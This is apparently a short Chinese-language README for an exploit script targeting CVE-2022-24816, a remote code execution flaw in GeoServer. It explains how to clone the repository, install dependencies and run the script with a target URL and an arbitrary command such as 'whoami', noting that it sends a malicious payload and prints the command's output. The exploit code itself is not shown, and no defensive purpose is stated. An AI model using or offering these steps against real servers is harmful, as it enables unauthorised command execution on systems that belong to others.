克隆仓库:
git clone https://github.com/c1ph3rbyt3/CVE-2022-24816.git
cd CVE-2022-24816
安装依赖: 请确保已安装 Python 3。然后运行以下命令安装所需依赖:
pip install -r requirements.txt
requirements.txt 文件包含以下库:
requestsurllib3colorama-u 或 --url:指定易受攻击的 GeoServer 服务器的目标 URL。例如:http://example.com 或 https://example.com。-c 或 --command:指定要在目标系统上执行的命令。使用特定命令运行脚本:
python CVE-2022-24816.py -u https://vulnerable-geoserver.com -c "whoami"
这会将恶意负载发送到目标服务器,并在屏幕上显示命令输出。
创建者:C1ph3rByt3